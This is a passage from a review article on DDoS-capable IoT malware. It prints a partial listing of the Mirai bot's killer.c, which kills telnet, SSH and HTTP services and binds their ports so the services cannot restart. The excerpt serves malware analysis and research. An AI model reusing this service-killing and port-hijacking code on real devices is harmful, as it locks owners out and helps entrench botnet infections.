Review Article
DDoS-Capable IoT Malwares: Comparative Analysis and Mirai Investigation
Listing 6
Mirai killer process kills and prevents restart of telnet, SSH, and HTTP services.
| root/mirai/bot/killer.c | | void killer_init(void) | | | | // … | | // Kill telnet service and prevent it from | | restarting | | if (killer_kill_by_port(htons(23))) | | //… | | tmp_bind_addr.sin_port = htons(23); | | if ((tmp_bind_fd = socket(AF_INET, | | SOCK_STREAM, 0)) != −1) | | | | bind(tmp_bind_fd, (struct sockaddr ) | | &tmp_bind_addr, | | sizeof (struct sockaddr_in)); | | listen(tmp_bind_fd, 1); | | | | // … | | // Kill SSH service and prevent it from | | restarting | | if (killer_kill_by_port(htons(22))) | | //… | | tmp_bind_addr.sin_port = htons(22); | | if ((tmp_bind_fd = socket(AF_INET, | | SOCK_STREAM, 0)) != −1) | | | | bind(tmp_bind_fd, (struct sockaddr ) | | & tmp_bind_addr, | | sizeof (struct sockaddr_in)); | | listen(tmp_bind_fd, 1); | | | | // … | | // Kill HTTP service and prevent it from | | restarting | | if (killer_kill_by_port(htons(80))) | | //… | | tmp_bind_addr.sin_port = htons(80); | | if ((tmp_bind_fd = socket(AF_INET, | | SOCK_STREAM, 0)) != −1) | | | | bind(tmp_bind_fd, (struct sockaddr ) | | & tmp_bind_addr, | | sizeof (struct sockaddr_in)); | | listen(tmp_bind_fd, 1); | | | | // … | | |
|
